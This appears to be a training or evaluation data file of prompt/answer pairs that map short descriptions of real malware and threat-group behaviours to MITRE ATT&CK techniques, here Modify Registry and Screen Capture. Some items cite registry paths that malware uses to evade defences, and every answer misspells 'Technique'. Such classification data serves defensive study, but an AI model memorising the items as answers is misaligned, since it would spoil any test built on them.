+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUNBURST had commands that allow an attacker to write or delete registry keys, and was observed stopping services by setting their HKLM\SYSTEM\CurrentControlSet\services\\[service_name]\\Start registry entries to value 4. It also deleted previously-created Image File Execution Options (IFEO) Debugger registry values and registry keys related to HTTP proxy to clean up traces of its activity.","Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Samurai loader component can create multiple Registry keys to force the svchost.exe process to load the final backdoor.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShadowPad can modify the Registry to store and maintain a configuration block and virtual file system.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Once Shamoon has access to a network share, it enables the RemoteRegistry service on the target system. It will then connect to the system with RegConnectRegistryW and modify the Registry to disable UAC remote restrictions by setting SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy to 1.","Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShimRat has registered two registry keys for shim databases.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sibot has modified the Registry to install a second-stage script in the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\sibot.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StreamEx has the ability to modify the Registry.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stuxnet can create registry keys to load driver files.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SynAck can manipulate Registry keys.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SysUpdate can write its configuration file to Software\Classes\scConfig in either HKEY_LOCAL_MACHINE or HKEY_CURRENT_USER.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TEARDROP modified the Registry to create a Windows service for itself on a compromised host.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TYPEFRAME can install encrypted configuration data under the Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\laxhost.dll and HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PrintConfigs.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Taidoor has the ability to modify the Registry on compromised hosts using RegDeleteValueA and RegCreateKeyExA.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TajMahal can set the KeepPrintedJobs attribute for configured printers in SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Print\\Printers to enable document stealing.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tarrask is able to delete the Security Descriptor (`SD`) registry subkey in order to “hide” scheduled tasks.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ThreatNeedle can modify the Registry to save its configuration data as the following RC4-encrypted Registry key: `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\GameCon`.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TinyTurla can set its configuration parameters in the Registry.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot can modify registry entries.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Uroburos can store configuration information in the Registry including the initialization vector and AES key needed to find and decrypt other Uroburos components.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ursnif has used Registry modifications as part of its installation routine.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Valak has the ability to modify the Registry key HKCU\Software\ApplicationContainer\Appsw64 to store information regarding the C2 server and downloads.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volgmer modifies the Registry to store an encoded configuration file in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Security.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WarzoneRAT can create `HKCU\Software\Classes\Folder\shell\open\command` as a new registry key during privilege escalation.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WastedLocker can modify registry values within the Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap registry key.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Waterbear has deleted certain values from the Registry to load a malicious DLL.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zeus Panda modifies several Registry keys under HKCU\Software\Microsoft\Internet Explorer\ PhishingFilter\ to disable phishing filters.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxShell can create Registry entries to enable services to run.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: gh0st RAT has altered the InstallTime subkey.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: metaMain can write the process ID of a target process into the `HKEY_LOCAL_MACHINE\SOFTWARE\DDE\tpid` Registry value as part of its reflective loading activity.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: njRAT can create, delete, or modify a specified Registry key or value.","Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: zwShell can modify the Registry.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has used tools to take screenshots from victims.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has used a screen capture utility to take screenshots on a compromised host.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BRONZE BUTLER has used a tool to capture screenshots.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dark Caracal took screenshots using their Windows malware.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has performed screen captures of victims, including by using a tool, scr.exe (which matched the hash of ScreenUtil).","Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 captured screenshots and desktop video recordings.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GOLD SOUTHFIELD has used the remote monitoring and management tool ConnectWise to obtain screen captures from victim's machines.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gamaredon Group's malware can take screenshots of the compromised computer every minute.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Malware used by Group5 is capable of watching the victim's screen.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound malware can take a screenshot and upload the file to its C2 server.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MoustachedBouncer has used plugins to take screenshots on targeted systems.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has used malware that can capture screenshots of the victim’s machine.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has a tool called CANDYKING to capture a screenshot of user's desktop.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Silence can capture victim screen activity.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Agent Tesla can capture screenshots of the victim’s desktop.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleSeed can take screenshots on a compromised host by calling a series of APIs.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aria-body has the ability to capture screenshots on compromised hosts.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AsyncRAT has the ability to view the screen on compromised hosts.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Attor's has a plugin that captures screenshots of the target applications.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Azorult can capture screenshots of the victim’s machines.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADHATCH can take screenshots and send them to an actor-controlled C2 server.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADNEWS has a command to take a screenshot and send it to the C2 server.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BISCUIT has a command to periodically take screenshots of the system.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLUELIGHT has captured a screenshot of the display every 30 seconds for the first 5 minutes after initiating a C2 loop, and then once every five minutes thereafter.","Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BadPatch captures screenshots in .jpg format and then exfiltrates them.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bandook is capable of taking an image of and uploading the current desktop.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackEnergy is capable of taking screenshots.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Brute Ratel C4 can take screenshots on compromised hosts.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CHOPSTICK has the capability to capture screenshots.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cadelspy has the ability to capture screenshots and webcam photos.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cannon can take a screenshot of the desktop.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carbanak performs desktop video recording and captures screenshots of the desktop and sends it to the C2 server.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carberp can capture display screenshots with the screens_dll.dll plugin.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cardinal RAT can capture screenshots.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Catchamas captures screenshots based on specific keywords in the window’s title.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chaes can capture screenshots of the infected machine.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CharmPower has the ability to capture screenshots.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chrommme has the ability to capture screenshots.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clambling has the ability to capture screenshots.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike's Beacon payload is capable of capturing screenshots.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobian RAT has a feature to perform screen capture.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ConnectWise can take screenshots on remote hosts.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CosmicDuke takes periodic screenshots and exfiltrates them.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Crimson contains a command to perform screen captures.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CrossRAT is capable of taking screen captures.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DOGCALL is capable of capturing screenshots of the victim's machine.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Daserf can take screenshots.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Derusbi is capable of performing screen captures.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DustySky captures PNG screenshots of the main screen.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ECCENTRICBANDWAGON can capture screenshots and store them locally.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire is capable of capturing screenshots on Windows and macOS systems.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EvilGrab has the capability to capture screenshots.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FinFisher takes a screenshot of the screen and displays it on top of all other windows for few seconds in an apparent attempt to hide some messages showed by the system during the setup process.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Flame can take regular screenshots when certain applications are open that are sent to the command and control server.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FlawedAmmyy can capture screenshots.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FruitFly takes screenshots of the user's desktop.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The FunnyDream ScreenCap component can take screenshots on a compromised host.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GRIFFON has used a screenshot module that can be used to take a screenshot of the remote system.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HALFBAKED can obtain screenshots from the victim.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HotCroissant has the ability to do real time screen viewing on an infected host.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hydraq includes a component based on the code of VNC that can stream a live feed of the desktop of an infected host.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HyperBro has the ability to take screenshots.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole can capture screenshots of not only the entire screen, but of each separate window open, in case they are overlapping.","Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A JHUHUGIT variant takes screenshots by simulating the user pressing the ""Take Screenshot"" key (VK_SCREENSHOT), accessing the screenshot saved in the clipboard, and converting it to a JPG image.","Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Janicab captured screenshots and sent them out to a C2 server.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KEYMARBLE can capture screenshots of the victim’s machine.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KONNI can take screenshots of the victim’s machine.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kasidet has the ability to initiate keylogging and screen captures.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kazuar captures screenshots of the victim’s screen.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KeyBoy has a command to perform screen grabbing.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kivars has the ability to capture screenshots on the infected host.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LitePower can take system screenshots and save them to `%AppData%`.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lizar can take JPEG screenshots of an infected system.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LookBack can take desktop screenshots.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MacMa has used Apple’s Core Graphic APIs, such as `CGWindowListCreateImageFromArray`, to capture the user's screen and open windows.","Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MacSpy can capture screenshots of the desktop over multiple monitors.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete captures screenshots.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mafalda can take a screenshot of the target machine and save it to a file.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MarkiRAT can capture screenshots that are initially saved as ‘scr.jpg’.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Matryoshka is capable of performing screen captures.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metamorfo can collect screenshots of the victim’s machine.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Micropsia takes screenshots every 90 seconds by calling the Gdi32.BitBlt API.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mispadu has the ability to capture screenshots on compromised hosts.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETWIRE can capture the victim's screen.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NKAbuse can take screenshots of the victim machine.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NightClub can load a module to call `CreateCompatibleDC` and `GdipSaveImageToStream` for screen capture.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ObliqueRAT can capture a screenshot of the current screen.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Octopus can capture screenshots of the victims’ machine.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POORAIM can perform screen capturing.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWERSTATS can retrieve screenshots from compromised hosts.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWRUNER can capture a screenshot from a victim.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PcShare can take screen shots of a compromised machine.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Peppy can take screenshots on targeted systems.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PlugX allows the operator to capture screenshots.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoetRAT has the ability to take screen captures.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerSploit's Get-TimedScreenshot Exfiltration module can take screenshots at regular intervals.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Prikormka contains a module that captures screenshots of the victim's desktop.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Proton captures the content of the desktop with the screencapture binary.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pteranodon can capture screenshots at a configurable interval.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pupy can drop a mouse-logger that will take small screenshots around at each click and then send back to the server.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QuietSieve has taken screenshots every five minutes and saved them to the user's local Application Data folder under `Temp\SymbolSourceSymbols\icons` or `Temp\ModeAuto\icons`.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RCSession can capture screenshots from a compromised host.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RDAT can take a screenshot on the infected system.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ROKRAT can capture screenshots of the infected system using the `gdi32` library.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RTM can capture screenshots.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RainyDay has the ability to capture screenshots.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ramsay can take screenshots every 30 seconds as well as when an external removable storage device is connected.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RedLeaves can capture screenshots.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remcos takes automated screenshots of the infected machine.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remexi takes screenshots of windows of interest.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RemoteUtilities can take screenshots on a compromised host.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Revenge RAT has a plugin for screen capture.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RogueRobin has a command named $screenshot that may be responsible for taking screenshots of the victim machine.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rover takes screenshots of the compromised system's desktop and saves them to C:\system\screenshot.bmp for exfiltration every 60 minutes.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SHUTTERSPEED can capture screenshots.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY can take a screenshot of the current desktop.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SLOTHFULMEDIA has taken a screenshot of a victim's desktop, named it ""Filter3.jpg"", and stored it in the local directory.","Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SMOKEDHAM can capture screenshots of the victim’s desktop.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SVCReady can take a screenshot from an infected host.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SharpStage has the ability to capture the victim's screen.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sliver can take screenshots of the victim’s active display.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Socksbot can take screenshots.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StoneDrill can take screenshots.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StrifeWater has the ability to take screen captures.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SysUpdate has the ability to capture screenshots.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
